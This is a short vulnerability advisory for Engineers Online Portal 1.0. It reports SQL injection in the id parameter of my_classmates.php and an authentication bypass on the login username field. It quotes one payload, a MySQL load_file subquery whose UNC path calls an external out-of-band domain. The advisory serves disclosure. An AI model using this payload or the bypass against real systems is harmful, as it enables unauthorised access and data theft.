# Exploit Title: Engineers Online Portal 1.0 is vulnerable to three types
of SQL injection attacks.
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 10.13.2021
# Vendor: https://www.sourcecodester.com/users/janobe
# Link:
https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html

[+] Exploit Source:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/janobe/CVE-nu11-101321

[+] Description:
The id parameter from my_classmates.php on the Engineers Online Portal app
appears to be vulnerable to three types of SQL injection
attacks, boolean-based blind, error-based, and UNION query.
The payload '+(select load_file('\
hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc'))+'
was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function
with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected
SQL query was executed.
Also, user login is vulnerable to SQL-Injection bypass authentication on
parameter "username".


----------------------------------------------------------------------------------------